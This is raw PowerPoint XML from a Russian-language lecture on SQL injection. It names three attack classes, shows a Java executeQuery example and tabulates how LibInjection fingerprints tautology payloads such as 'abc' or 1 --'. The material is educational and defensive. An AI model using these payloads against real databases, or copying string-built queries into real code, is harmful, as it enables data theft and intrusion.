                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>( ... );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>statement.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59014D9-E8C4-4D83-9854-3FE353818DA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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238F6D28-CECB-4DD1-8CCF-4737F7C63D8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1617183"/>
            <a:ext cx="10635779" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Существует три основных класса атак, основанных на внедрении SQL-кода: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="ru-RU"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Классическая SQL инъекция (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Classic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL инъекция, основанная на эксплуатации выводимых СУБД сообщений об ошибках (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Error-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Слепая SQL инъекция (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Рассмотрим причины их возникновения на примере на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A26D06-066D-4CEF-865D-FDC06AD908A4}"/>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Причины возникновения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400"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32409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Таблица 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D82C779-C5AA-02AD-A6C7-E50E5356CCAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2532633441"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5140263" y="1932130"/>
          <a:ext cx="6018464" cy="2993740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{69CF1AB2-1976-4502-BF36-3FF5EA218861}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="955566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2010631058"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="475449">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3888891448"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="716174">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2873732225"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="716841">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="664713960"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="736513">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1657026626"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="716174">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="601591874"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="724176">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1860976408"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="977571">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="504818740"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="459918">
                <a:tc gridSpan="7">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="2155190" marR="2146935" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="410"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>За</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="5" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>п</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>р</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ос</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="148590">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="410"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fingerpr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>nt</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340421366"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379932">
                <a:tc gridSpan="7">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="2098675" marR="2090420" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="210"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>За</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>п</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>р</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ос 1</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="215"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fingerprint</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298362185"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480015">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Часть</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>з</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>а</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>пр</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>о</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>са</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abc'</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or</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1</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3025">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</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3025">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-</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rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&amp;1c</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936067938"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379932">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>То</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>кен</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s</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&amp;</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1</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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>o</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1</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c</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="ru-RU"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="735837608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379932">
                <a:tc gridSpan="7">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="2098675" marR="2090420" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="265"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>За</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>п</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>р</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ос 2</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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fingerprint</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069788648"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480015">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Часть з</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>а</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>пр</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>о</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>са</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abc'</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or</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true</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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>#</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ru-RU"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>s&amp;1c</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606459431"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="380932">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="68580">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" spc="-5">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>То</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>кен</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s</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&amp;</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o</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72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="18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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="72390">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="270"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1000"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>с</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU"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ru-RU"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="ru-RU"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254830855"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD35C5EE-CAEF-4425-9304-FA5C5E8DEB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442914" y="1932130"/>
            <a:ext cx="4284662" cy="3416320"/>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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>LibInjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
